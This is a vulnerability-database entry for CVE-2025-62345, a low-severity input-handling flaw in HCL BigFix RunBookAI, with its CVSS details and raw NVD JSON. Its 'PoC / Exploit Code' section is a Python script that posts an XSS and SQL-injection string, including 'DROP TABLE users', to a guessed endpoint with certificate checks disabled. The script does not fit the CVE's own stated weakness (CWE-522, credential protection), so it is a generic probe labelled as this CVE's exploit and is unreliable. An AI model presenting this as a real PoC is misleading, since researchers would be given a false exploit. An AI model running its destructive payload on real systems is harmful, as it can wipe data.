Security Vulnerability Report
中文
CVE-2025-62345 CVSS 2.7 LOW

CVE-2025-62345

Published: 2026-05-06 12:16:27
Last Modified: 2026-05-06 19:05:56

Description

HCL BigFix RunBookAI is affected by a Continued availability of Less-Secure “Input Text” Vulnerability . A component contains a security weakness in its input handling implementation, increasing the risk of misconfiguration and operational errors.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HCL BigFix RunBookAI (具体受影响版本请参考 HCL 官方公告 KB0130444)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Example) target_url = "https://target-bigfix-server/api/input_text" # Malicious payload to test input validation # This payload attempts to inject special characters to trigger an error or information leak payload = { "input_text": "<script>alert('xss')</script>; DROP TABLE users; --", "config_id": "12345" } # Authentication headers (High Privilege Required) headers = { "Authorization": "Bearer <HIGH_PRIVILEGE_TOKEN>", "Content-Type": "application/json" } try: # Send POST request response = requests.post(target_url, json=payload, headers=headers, verify=False) # Check response for indicators of vulnerability (e.g., error messages, unhandled input) if response.status_code == 200 and "error" in response.text.lower(): print("[+] Potential vulnerability detected. The server returned an error message.") print(f"[+] Response: {response.text}") else: print("[-] Vulnerability not triggered or input was sanitized.") except Exception as e: print(f"[!] Error during request: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62345", "sourceIdentifier": "[email protected]", "published": "2026-05-06T12:16:26.957", "lastModified": "2026-05-06T19:05:56.337", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix RunBookAI is affected by a Continued availability of Less-Secure “Input Text” Vulnerability . A component contains a security weakness in its input handling implementation, increasing the risk of misconfiguration and operational errors."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130444", "source": "[email protected]"}]}}